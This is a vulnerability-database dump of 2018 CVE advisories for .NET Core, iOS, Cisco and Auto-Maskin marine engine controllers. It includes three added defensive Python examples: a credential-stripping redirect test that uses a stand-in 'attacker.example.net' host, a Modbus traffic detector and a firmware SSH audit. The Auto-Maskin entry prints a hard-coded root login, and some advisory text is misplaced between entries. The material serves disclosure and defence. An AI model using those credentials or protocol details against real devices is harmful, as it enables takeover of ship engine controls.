VARIoT IoT vulnerabilities database
| VAR-201810-1125 | CVE-2018-8292 | Microsoft .NET Core and PowerShell Core Information disclosure vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An information disclosure vulnerability exists in .NET Core when authentication information is inadvertently exposed in a redirect, aka ".NET Core Information Disclosure Vulnerability." This affects .NET Core 2.1, .NET Core 1.0, .NET Core 1.1, PowerShell Core 6.0.
An attacker can exploit this issue to obtain sensitive information, which may aid in further attacks.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: .NET Core on Red Hat Enterprise Linux security update
Advisory ID: RHSA-2018:2902-01
Product: .NET Core on Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2018:2902
Issue date: 2018-10-09
CVE Names: CVE-2018-8292
=====================================================================
1. Summary:
Updates for rh-dotnetcore11-dotnetcore, and rh-dotnetcore10-dotnetcore are
now available for .NET Core on Red Hat Enterprise Linux.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64
.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
.NET Core is a managed software framework. It implements a subset of the
.NET framework APIs and several new APIs, and it includes a CLR
implementation.
These versions correspond to the October 2018 security release by .NET Core
upstream projects.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
rh-dotnetcore10-dotnetcore-1.0.13-1.el7.src.rpm
x86_64:
rh-dotnetcore10-dotnetcore-1.0.13-1.el7.x86_64.rpm
rh-dotnetcore10-dotnetcore-debuginfo-1.0.13-1.el7.x86_64.rpm
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
rh-dotnetcore11-dotnetcore-1.1.10-1.el7.src.rpm
x86_64:
rh-dotnetcore11-dotnetcore-1.1.10-1.el7.x86_64.rpm
rh-dotnetcore11-dotnetcore-debuginfo-1.1.10-1.el7.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Server (v. 7):
Source:
rh-dotnetcore10-dotnetcore-1.0.13-1.el7.src.rpm
x86_64:
rh-dotnetcore10-dotnetcore-1.0.13-1.el7.x86_64.rpm
rh-dotnetcore10-dotnetcore-debuginfo-1.0.13-1.el7.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Server (v. 7):
Source:
rh-dotnetcore11-dotnetcore-1.1.10-1.el7.src.rpm
x86_64:
rh-dotnetcore11-dotnetcore-1.1.10-1.el7.x86_64.rpm
rh-dotnetcore11-dotnetcore-debuginfo-1.1.10-1.el7.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-dotnetcore10-dotnetcore-1.0.13-1.el7.src.rpm
x86_64:
rh-dotnetcore10-dotnetcore-1.0.13-1.el7.x86_64.rpm
rh-dotnetcore10-dotnetcore-debuginfo-1.0.13-1.el7.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-dotnetcore11-dotnetcore-1.1.10-1.el7.src.rpm
x86_64:
rh-dotnetcore11-dotnetcore-1.1.10-1.el7.x86_64.rpm
rh-dotnetcore11-dotnetcore-debuginfo-1.1.10-1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2018-8292
https://access.redhat.com/security/updates/classification/#moderate
https://github.com/dotnet/announcements/issues/88
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBW71EydzjgjWX9erEAQhK3Q/8DwPo83R6HBwUmO2gO56n0ci7BOOZ1HfH
VYRSvXSPaBf8fbFSaZN5+OJhPBJfnCiEIgO8cSuMYf3zWebkIONZnkzB55BJqD0N
Z7wS2R4bI6Mw33K9ET2WhoUF7JiZDU+Spu7T2TW9roAms7U7IJBXMi52N3pAS3yQ
gzvB8Fuci3xsGqyIYMgt0SmqnlkqbZmR35Yq7e3yxMzAlY/lp7tfQ/ZxIHfxDKh3
NrT8nKj58i0WGlOKxlWsTDadHwrCe9YoZVn8FRJJdCDE+tjW6KNmXKOy08qPfp3n
LuikowCnqyQh6CoKJ91q47zsq7j8hisj0z7CgMLxO2Y4Gk9hSni5ynlxlDUYWDrB
f9mi4LlnBp1Dwjnv7IJee9SXR4M7fIuwbexhBv8OGzijwXvHZkfZ5aceTAqrBYIb
INZNaHwGQIgwkHkanz3N6pPbrfXTvOfcIWmrctyYfI05RsW4FRXm1dh2tF7y1uK7
FgWNvDxAAZqYhk2SBYPtUfQNkNktkLZ0M76QEXcgCrYr5OTTCM92pxZjLPmbYx2Y
+1Kl+cSvk3nschXLbuXjGtWiuBrJXtdDW8ytt2bC5lyxylo8mYSl7G5V0eDifMKs
sdHtMLM5S+4xrAQ4avNEFgqz4h78s6mY4Dq9fXkZUbYXLFLbaIb/foGUnnWJ5/az
9K+HIBmUA6I=
=+FXG
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
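The flaw behind CVE-2018-8292 is credentials travelling with a redirect. The following is an added example, not .NET Core's or Red Hat's code: a small redirect-following client that applies the generic mitigation, keeping credential headers only while the redirect stays on the same origin (scheme, host, port). The transport is a constructed in-memory stub, so the example runs offline; the host names, the token and the exact set of headers treated as credentials are this example's own choices.

```python
"""Added example (not .NET Core's or Red Hat's code): a redirect-following
client that strips credential-bearing headers on a cross-origin redirect.
The transport, hosts and token below are constructed for the example."""
from urllib.parse import urlsplit, urljoin

# Headers that must not follow a redirect to a different origin (example policy).
CREDENTIAL_HEADERS = {"authorization", "proxy-authorization", "cookie"}

def origin(url):
    """Return (scheme, host, port) with default ports made explicit."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme.lower() == "https" else 80)
    return (u.scheme.lower(), (u.hostname or "").lower(), port)

def headers_for_redirect(headers, from_url, to_url):
    """Same origin: keep everything. Different origin: drop credential headers."""
    if origin(from_url) == origin(to_url):
        return dict(headers)
    return {k: v for k, v in headers.items() if k.lower() not in CREDENTIAL_HEADERS}

def follow(transport, url, headers, max_redirects=5):
    """Issue a request and follow 3xx Location hops under the policy above.
    transport(url, headers) -> (status, response_headers); it is a stub here."""
    hops = [url]
    for _ in range(max_redirects + 1):
        status, resp = transport(url, headers)
        location = resp.get("Location")
        if status not in (301, 302, 303, 307, 308) or not location:
            return status, hops, headers
        nxt = urljoin(url, location)
        headers = headers_for_redirect(headers, url, nxt)
        url = nxt
        hops.append(url)
    raise RuntimeError("too many redirects")

# Constructed transport: the API host redirects to a third-party host, and we
# record which headers each host received so the leak (or its absence) is visible.
SEEN = {}

def stub_transport(url, headers):
    host = urlsplit(url).hostname
    SEEN[host] = dict(headers)
    if host == "api.example.com":
        return 302, {"Location": "https://attacker.example.net/capture"}
    return 200, {}

def demo():
    """Run the constructed exchange; returns (final status, hops, final headers)."""
    SEEN.clear()
    headers = {"Authorization": "Bearer constructed-token", "Accept": "application/json"}
    return follow(stub_transport, "https://api.example.com/v1/me", headers)

if __name__ == "__main__":
    print(demo())
    print({host: sorted(h) for host, h in SEEN.items()})
```

After the run, SEEN shows the Authorization header reaching api.example.com but not attacker.example.net, which is the behaviour a patched client should exhibit; a client without the origin comparison would hand the bearer token to whatever host the redirect names.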
| VAR-201810-0020 | CVE-2016-7475 | BIG-IP Input validation vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Under some circumstances on BIG-IP 12.0.0-12.1.0, 11.6.0-11.6.1, or 11.4.0-11.5.4 HF1, the Traffic Management Microkernel (TMM) may not properly clean up pool member network connections when using SPDY or HTTP/2 virtual server profiles. BIG-IP contains an input validation vulnerability that may result in a denial of service (DoS). F5 BIG-IP is an all-in-one network device from F5 Networks that integrates network traffic management, application security management, load balancing and other functions. Attackers can exploit this vulnerability to cause service interruption. The following versions are affected: F5 BIG-IP 12.0.0 to 12.1.0, 11.6.0 to 11.6.1, and 11.4.0 to 11.5.4 HF1.
| VAR-201904-1435 | CVE-2018-4380 | iOS Lock screen vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
A lock screen issue allowed access to photos and contacts on a locked device. This issue was addressed by restricting options offered on a locked device. This issue affected versions prior to iOS 12.0.1. Apple has released updates for the affected products. The impact depends on the vulnerability, and may include: denial of service (DoS), arbitrary code execution, script execution, information disclosure, and bypass of access restrictions. Apple iOS is prone to multiple local information-disclosure vulnerabilities.
Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks. VoiceOver is the built-in screen reader of iOS.
CVE-2018-4380: videosdebarraquito
Quick Look
Available for: iPhone 5s and later, iPad Air and later,
and iPod touch 6th generation
Impact: A local attacker may be able to share items from
the lock screen
Description: A lock screen issue allowed access to the share function
on a locked device.
CVE-2018-4379: videosdebarraquito
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
| VAR-201904-1434 | CVE-2018-4379 | iOS Lock screen vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
A lock screen issue allowed access to the share function on a locked device. This issue was addressed by restricting options offered on a locked device. This issue affected versions prior to iOS 12.0.1. Apple has released updates for the affected products. The impact depends on the vulnerability, and may include: denial of service (DoS), arbitrary code execution, script execution, information disclosure, and bypass of access restrictions. Apple iOS is prone to multiple local information-disclosure vulnerabilities.
Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks. Quick Look is the component used to preview common file types. An information disclosure vulnerability exists in the Quick Look component of Apple iOS prior to 12.0.1.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2018-10-08-1 iOS 12.0.1
iOS 12.0.1 is now available and addresses the following:
VoiceOver
Available for: iPhone 5s and later, iPad Air and later,
and iPod touch 6th generation
Impact: A local attacker may be able to view photos and contacts from
the lock screen
Description: A lock screen issue allowed access to photos and
contacts on a locked device.
CVE-2018-4380: videosdebarraquito
| VAR-201810-0766 | CVE-2018-1000804 | contiki-ng Buffer error vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
contiki-ng version 4 contains a buffer overflow vulnerability in the AQL (Antelope Query Language) database engine that can result in remote code execution on a device running the Contiki-NG operating system. Exploitation requires that the attacker be able to run malicious AQL code (e.g. via an SQL-like injection attack). contiki-ng contains a buffer error vulnerability that may allow information to be obtained or altered, or cause a denial of service (DoS). Contiki-NG is an open source cross-platform operating system for the next generation of IoT devices. Antelope is the relational database engine built into Contiki-NG, and AQL (Antelope Query Language) is its query language.
The AQL database engine in Contiki-NG 4 has a buffer overflow vulnerability.
| VAR-201810-1624 | No CVE | Any user password retrieval vulnerability exists on the smart campus platform |
CVSS V2: 6.4 CVSS V3: - Severity: MEDIUM |
The smart campus platform is a set of smart campus systems developed by Guangdong Zhizhe Internet of Things Technology Co., Ltd. The system involves a number of functional modules such as teaching affairs scheduling, class adjustment, class statistics, teacher leave, student big data management platform, attendance management, logistics equipment management, home-school communication platform and other functional modules.
The smart campus platform has an arbitrary user password retrieval vulnerability. The vulnerability stems from a flaw in the authentication mechanism when the user password is reset in the forgot password function. An attacker can use the vulnerability to set a new user password and view student information after obtaining application permissions.
| VAR-201810-1414 | CVE-2018-5400 | Auto-Maskin DCU 210E RP 210E and Marine Pro Observer App |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
The Auto-Maskin products utilize an undocumented custom protocol to set up Modbus communications with other devices without validating those devices. The originating device sends a message in plaintext, 48:65:6c:6c:6f:20:57:6f:72:6c:64, "Hello World" over UDP ports 44444-44446 to the broadcast address for the LAN. Without verification devices respond to any of these broadcast messages on the LAN with a plaintext reply over UDP containing the device model and firmware version. Following this exchange the devices allow Modbus transmissions between the two devices on the standard Modbus port 502 TCP. Impact: An attacker can exploit this vulnerability to send arbitrary messages to any DCU or RP device through spoofing or replay attacks as long as they have access to the network. Affected releases are Auto-Maskin DCU-210E RP-210E: Versions prior to 3.7 on ARMv7.
Auto-Maskin DCU engine control units and RP remote panels are products that monitor and control ship engines. These products contain multiple authentication and encryption vulnerabilities; an attacker who can reach them could take over the operation of the ship's engine.
Use of hard-coded credentials (CWE-798) - CVE-2018-5399: the DCU 210E firmware includes a Dropbear SSH server that is not documented, and the username and password for the SSH connection are hard-coded and easily guessable.
Insufficient verification of connection source (CWE-346) - CVE-2018-5400: the product uses an undocumented proprietary protocol to set up Modbus communication with other devices, but does not verify the validity of the peer device.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5401: the product sends control information over unencrypted Modbus.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5402: the web server included in the product sends the administrator PIN in unencrypted plain text.
These vulnerabilities were reported by Brian Satira and Brian Olson. An attacker could use these vulnerabilities to obtain information such as device configuration and sensor operating status, and could also send arbitrary Modbus (control) messages.
Auto-Maskin DCU 210E, RP 210E and Marine Pro Observer App are prone to the following security vulnerabilities:
1. A hard-coded-credentials security-bypass vulnerability.
2. A security-bypass vulnerability.
3. Multiple information-disclosure vulnerabilities.
Attackers may exploit these issues to gain unauthorized access to the affected application, bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information.
| VAR-201810-1415 | CVE-2018-5401 | Auto-Maskin DCU 210E RP 210E and Marine Pro Observer App |
CVSS V2: 4.3 CVSS V3: 5.9 Severity: MEDIUM |
The Auto-Maskin DCU 210E, RP-210E, and Marine Pro Observer Android App transmit sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. The devices transmit process control information via unencrypted Modbus communications. Impact: An attacker can exploit this vulnerability to observe information about configurations, settings, what sensors are present and in use, and other information to aid in crafting spoofed messages. Requires access to the network. Affected releases are Auto-Maskin DCU-210E, RP-210E, and Marine Pro Observer Android App. Versions prior to 3.7 on ARMv7.
Auto-Maskin DCU engine control units and RP remote panels are products that monitor and control ship engines. These products contain multiple authentication and encryption vulnerabilities; an attacker who can reach them could take over the operation of the ship's engine.
Use of hard-coded credentials (CWE-798) - CVE-2018-5399: the DCU 210E firmware includes a Dropbear SSH server that is not documented, and the username and password for the SSH connection are hard-coded and easily guessable.
Insufficient verification of connection source (CWE-346) - CVE-2018-5400: the product uses an undocumented proprietary protocol to set up Modbus communication with other devices, but does not verify the validity of the peer device.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5402: the web server included in the product sends the administrator PIN in unencrypted plain text.
Auto-Maskin DCU 210E, RP 210E and Marine Pro Observer App are prone to the following security vulnerabilities:
1. A hard-coded-credentials security-bypass vulnerability.
2. A security-bypass vulnerability.
3. Multiple information-disclosure vulnerabilities.
Attackers may exploit these issues to gain unauthorized access to the affected application, bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information. Auto-Maskin DCU-210E and RP-210E are engine control panels.
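The two network-side issues above (CVE-2018-5400, the unauthenticated "Hello World" discovery broadcast on UDP 44444-44446, and CVE-2018-5401, the unencrypted Modbus control traffic that follows it) can be spotted on the wire. The following is an added example, not Auto-Maskin's or the reporters' code: detection logic run over a constructed list of packet records that flags the discovery probe and reply and then decodes the cleartext Modbus/TCP write that follows. The packet records, addresses and the "DCU-210E 3.6" reply string are constructed; the assumption that a device answers to the probe's UDP source port is this example's own, as the advisory does not state the reply port.

```python
"""Added example (not Auto-Maskin's or the reporters' code): flag the plaintext
UDP discovery exchange described in CVE-2018-5400 and decode the unauthenticated
Modbus/TCP writes of CVE-2018-5401 from constructed packet records."""
import struct

HELLO = bytes.fromhex("48656c6c6f20576f726c64")   # "Hello World", as quoted in the advisory
DISCOVERY_PORTS = range(44444, 44447)               # UDP 44444-44446
MODBUS_PORT = 502
WRITE_FUNCS = {5: "Write Single Coil", 6: "Write Single Register",
               15: "Write Multiple Coils", 16: "Write Multiple Registers"}

def decode_modbus_tcp(payload):
    """Parse an MBAP header (tid, protocol id, length, unit id) plus PDU.
    Returns a dict, or None if the frame is malformed."""
    if len(payload) < 8:
        return None
    tid, pid, length, unit = struct.unpack(">HHHB", payload[:7])
    if pid != 0 or length != len(payload) - 6:
        return None
    func, data = payload[7], payload[8:]
    out = {"tid": tid, "unit": unit, "func": func, "name": WRITE_FUNCS.get(func, "other")}
    if func in (5, 6) and len(data) == 4:                 # address, value
        out["address"], out["value"] = struct.unpack(">HH", data)
    elif func == 16 and len(data) >= 5:                   # address, quantity, byte count, values
        addr, qty, nbytes = struct.unpack(">HHB", data[:5])
        if nbytes == 2 * qty and len(data) == 5 + nbytes:
            out["address"] = addr
            out["values"] = list(struct.unpack(">%dH" % qty, data[5:]))
    return out

def is_broadcast(addr):
    """Example heuristic for a LAN broadcast destination."""
    return addr == "255.255.255.255" or addr.endswith(".255")

def analyse(records):
    """records: (proto, src, sport, dst, dport, payload) tuples in capture order.
    Returns a list of findings. The reply rule assumes the device answers back to
    the probe's source port (an assumption made for this example)."""
    findings, probers = [], {}
    for proto, src, sport, dst, dport, payload in records:
        if proto == "udp" and dport in DISCOVERY_PORTS and is_broadcast(dst) and payload == HELLO:
            probers[src] = sport
            findings.append(("discovery-probe", src, dst, dport))
        elif proto == "udp" and dst in probers and dport == probers[dst]:
            findings.append(("discovery-reply", src, payload.decode("ascii", "replace")))
        elif proto == "tcp" and dport == MODBUS_PORT:
            pdu = decode_modbus_tcp(payload)
            if pdu and pdu["func"] in WRITE_FUNCS:
                # fourth field: did this writer go through the discovery handshake first?
                findings.append(("cleartext-modbus-write", src, dst, src in probers, pdu))
    return findings

# Constructed capture: a host broadcasts the probe, a DCU answers with model and
# firmware version, and the host then writes holding register 16 over plain Modbus/TCP.
CAPTURE = [
    ("udp", "192.0.2.50", 50000, "192.0.2.255", 44444, HELLO),
    ("udp", "192.0.2.10", 44444, "192.0.2.50", 50000, b"DCU-210E 3.6"),
    ("tcp", "192.0.2.50", 40001, "192.0.2.10", 502,
     struct.pack(">HHHBBHH", 1, 0, 6, 1, 6, 0x0010, 0x01F4)),
]

if __name__ == "__main__":
    for finding in analyse(CAPTURE):
        print(finding)
```

Nothing in the decoded write identifies or authenticates the sender: a host that has seen the broadcast exchange (or simply knows the device address) can send the same frame. That is why the advisory's impact statement covers spoofing and replay, and why a monitoring rule for these devices should alert on any Modbus write from a host that is not the expected controller.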
| VAR-201810-1416 | CVE-2018-5402 | Auto-Maskin DCU 210E RP 210E and Marine Pro Observer App |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
The Auto-Maskin DCU 210E, RP-210E, and Marine Pro Observer Android App use an embedded webserver that uses unencrypted plaintext for the transmission of the administrator PIN. Impact: An attacker once authenticated can change configurations, upload new configuration files, and upload executable code via file upload for firmware updates. Requires access to the network. Affected releases are Auto-Maskin DCU-210E, RP-210E, and the Marine Pro Observer Android App. Versions prior to 3.7 on ARMv7.
Auto-Maskin DCU engine control units and RP remote panels are products that monitor and control ship engines. These products contain multiple authentication and encryption vulnerabilities; an attacker who can reach them could take over the operation of the ship's engine.
Use of hard-coded credentials (CWE-798) - CVE-2018-5399: the DCU 210E firmware includes a Dropbear SSH server that is not documented, and the username and password for the SSH connection are hard-coded and easily guessable.
Insufficient verification of connection source (CWE-346) - CVE-2018-5400: the product uses an undocumented proprietary protocol to set up Modbus communication with other devices, but does not verify the validity of the peer device.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5401: the product sends control information over unencrypted Modbus.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5402: the web server included in the product sends the administrator PIN in unencrypted plain text.
These vulnerabilities were reported by Brian Satira and Brian Olson. An attacker could use these vulnerabilities to obtain information such as device configuration and sensor operating status, and could also send arbitrary Modbus (control) messages.
Auto-Maskin DCU 210E, RP 210E and Marine Pro Observer App are prone to the following security vulnerabilities:
1. A hard-coded-credentials security-bypass vulnerability.
2. A security-bypass vulnerability.
3. Multiple information-disclosure vulnerabilities.
Attackers may exploit these issues to gain unauthorized access to the affected application, bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information. Auto-Maskin DCU-210E and RP-210E are engine control panels.
| VAR-201810-1413 | CVE-2018-5399 | Auto-Maskin DCU 210E RP 210E and Marine Pro Observer App |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The Auto-Maskin DCU 210E firmware contains an undocumented Dropbear SSH server, v2015.55, configured to listen on Port 22 while the DCU is running. The Dropbear server is configured with a hard-coded user name and password combination of root / amroot. The server is configured to use password only authentication not cryptographic keys, however the firmware image contains an RSA host-key for the server. An attacker can exploit this vulnerability to gain root access to the Angstrom Linux operating system and modify any binaries or configuration files in the firmware. Affected releases are Auto-Maskin DCU-210E RP-210E: Versions prior to 3.7 on ARMv7.
Auto-Maskin DCU engine control units and RP remote panels are products that monitor and control ship engines. These products contain multiple authentication and encryption vulnerabilities; an attacker who can reach them could take over the operation of the ship's engine. The username and password for the SSH connection are hard-coded and easily guessable.
Insufficient verification of connection source (CWE-346) - CVE-2018-5400: the product uses an undocumented proprietary protocol to set up Modbus communication with other devices, but does not verify the validity of the peer device.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5401: the product sends control information over unencrypted Modbus.
Cleartext transmission of sensitive information (CWE-319) - CVE-2018-5402: the web server included in the product sends the administrator PIN in unencrypted plain text.
These vulnerabilities were reported by Brian Satira and Brian Olson. An attacker could use these vulnerabilities to obtain information such as device configuration and sensor operating status, and could also send arbitrary Modbus (control) messages.
Auto-Maskin DCU 210E, RP 210E and Marine Pro Observer App are prone to the following security vulnerabilities:
1. A hard-coded-credentials security-bypass vulnerability.
2. A security-bypass vulnerability.
3. Multiple information-disclosure vulnerabilities.
Attackers may exploit these issues to gain unauthorized access to the affected application, bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information.
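Every condition in the CVE-2018-5399 description (an undocumented Dropbear server, a host key shipped inside the image, a root account with a usable password, password-only authentication) is visible in an unpacked firmware root filesystem before the device is ever powered on. The following is an added example, not Auto-Maskin's code: a static audit of such a tree, run here against a constructed rootfs in a temporary directory. The file layout follows the usual Dropbear conventions (binary under usr/sbin, keys under etc/dropbear, an init script under etc/init.d) and the Dropbear options it looks for are the real ones (-s disables password logins, -g disables password logins for root, -w disallows root logins); the hash strings and script contents are constructed.

```python
"""Added example (not Auto-Maskin's code): static audit of an unpacked firmware
root filesystem for the SSH exposure described in CVE-2018-5399. The rootfs
below is constructed in a temporary directory."""
import os
import re
import tempfile

DROPBEAR_PATHS = ("usr/sbin/dropbear", "sbin/dropbear", "usr/bin/dropbear")
# Dropbear options that turn off password logins: -s (all users), -g (root), -w (no root login)
NO_PASSWORD_FLAGS = {"-s", "-g", "-w"}

def _read(path):
    try:
        with open(path, "r", errors="replace") as f:
            return f.read()
    except OSError:
        return ""

def audit_rootfs(root):
    """Return findings about SSH exposure in the unpacked image rooted at `root`."""
    findings = {}
    findings["dropbear_present"] = any(os.path.exists(os.path.join(root, p)) for p in DROPBEAR_PATHS)

    # A host key inside the image is shared by every device built from it.
    key_dir = os.path.join(root, "etc/dropbear")
    names = os.listdir(key_dir) if os.path.isdir(key_dir) else []
    findings["host_keys_in_image"] = sorted(n for n in names if "host_key" in n)

    # shadow: name:hash:...  A hash of "*", "!" or empty means no password login.
    root_hash = None
    for line in _read(os.path.join(root, "etc/shadow")).splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[0] == "root":
            root_hash = fields[1]
    findings["root_password_set"] = bool(root_hash) and not root_hash.startswith(("*", "!"))

    # Init scripts: find the dropbear launch line and see whether password logins are disabled.
    launch_args = None
    for d in ("etc/init.d", "etc/rc.d"):
        dpath = os.path.join(root, d)
        for name in (os.listdir(dpath) if os.path.isdir(dpath) else []):
            m = re.search(r"^\s*(?:\S*/)?dropbear\b(.*)$", _read(os.path.join(dpath, name)), re.M)
            if m:
                launch_args = m.group(1).split()
    findings["password_login_enabled"] = launch_args is not None and not (NO_PASSWORD_FLAGS & set(launch_args))
    return findings

def build_constructed_rootfs():
    """Constructed tree resembling the advisory's description: Dropbear binary, RSA host
    key in the image, root with a password hash, init script with password logins on."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    for d in ("usr/sbin", "etc/dropbear", "etc/init.d"):
        os.makedirs(os.path.join(root, d))
    open(os.path.join(root, "usr/sbin/dropbear"), "wb").close()
    with open(os.path.join(root, "etc/dropbear/dropbear_rsa_host_key"), "wb") as f:
        f.write(b"constructed-key-material")
    with open(os.path.join(root, "etc/shadow"), "w") as f:
        f.write("root:$1$constructed$0123456789abcdef:17000:0:99999:7:::\n")
    with open(os.path.join(root, "etc/init.d/S50dropbear"), "w") as f:
        f.write("#!/bin/sh\n/usr/sbin/dropbear -p 22 -r /etc/dropbear/dropbear_rsa_host_key\n")
    return root

def harden_constructed_rootfs(root):
    """Lock root's password and start Dropbear with password logins disabled (-s -w)."""
    with open(os.path.join(root, "etc/shadow"), "w") as f:
        f.write("root:*:17000:0:99999:7:::\n")
    with open(os.path.join(root, "etc/init.d/S50dropbear"), "w") as f:
        f.write("#!/bin/sh\n/usr/sbin/dropbear -s -w -p 22 -r /etc/dropbear/dropbear_rsa_host_key\n")
    return root

if __name__ == "__main__":
    fs = build_constructed_rootfs()
    print("before:", audit_rootfs(fs))
    print("after: ", audit_rootfs(harden_constructed_rootfs(fs)))
```

The hardened variant still reports the host key in the image; that finding is correct and is fixed separately by generating host keys on first boot rather than shipping one, otherwise every unit presents the same key and a captured one impersonates all of them.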
| VAR-201810-0595 | CVE-2018-15425 | Cisco Identity Services Engine Input validation vulnerability |
CVSS V2: 6.5 CVSS V3: 4.7 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device with the privileges of the web server. Cisco ISE contains an input validation vulnerability that may allow information to be obtained or altered, or cause a denial of service (DoS). Cisco Identity Services Engine (ISE) is an identity-based, context-aware platform from Cisco. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and enforcing corresponding policies. An input validation vulnerability exists in the web-based management interface of Cisco ISE.
| VAR-201810-0594 | CVE-2018-15424 | Cisco Identity Services Engine Input validation vulnerability |
CVSS V2: 6.5 CVSS V3: 4.7 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device with the privileges of the web server. Cisco ISE contains an input validation vulnerability that may allow information to be obtained or altered, or cause a denial of service (DoS). Cisco Identity Services Engine (ISE) is an identity-based, context-aware platform from Cisco. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and enforcing corresponding policies. An input validation vulnerability exists in the web-based management interface of Cisco ISE.
| VAR-201810-0582 | CVE-2018-15397 | Cisco Adaptive Security Appliance and Firepower Threat Defense Software key management error vulnerability |
CVSS V2: 7.1 CVSS V3: 6.8 Severity: MEDIUM |
A vulnerability in the implementation of Traffic Flow Confidentiality (TFC) over IPsec functionality in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to an error that may occur if the affected software renegotiates the encryption key for an IPsec tunnel when certain TFC traffic is in flight. An attacker could exploit this vulnerability by sending a malicious stream of TFC traffic through an established IPsec tunnel on an affected device. A successful exploit could allow the attacker to cause a daemon process on the affected device to crash, which could cause the device to crash and result in a DoS condition. Cisco ASA Software is the operating system running on the ASA firewall; Cisco FTD Software is a unified software suite that provides next-generation firewall services.
| VAR-201810-0573 | CVE-2018-15383 | Cisco Adaptive Security Appliance and Firepower Threat Defense Software depletion vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the cryptographic hardware accelerator driver of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a temporary denial of service (DoS) condition. The vulnerability exists because the affected devices have a limited amount of Direct Memory Access (DMA) memory and the affected software improperly handles resources in low-memory conditions. An attacker could exploit this vulnerability by sending a sustained, high rate of malicious traffic to an affected device to exhaust memory on the device. A successful exploit could allow the attacker to exhaust DMA memory on the affected device, which could cause the device to reload and result in a temporary DoS condition. Cisco ASA 5506-X with FirePOWER Services and the other appliances listed below are Cisco security devices; Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software are the operating systems used on them. The following products are affected: Cisco ASA 5506-X with FirePOWER Services; ASA 5506H-X with FirePOWER Services; ASA 5506W-X with FirePOWER Services; ASA 5508-X 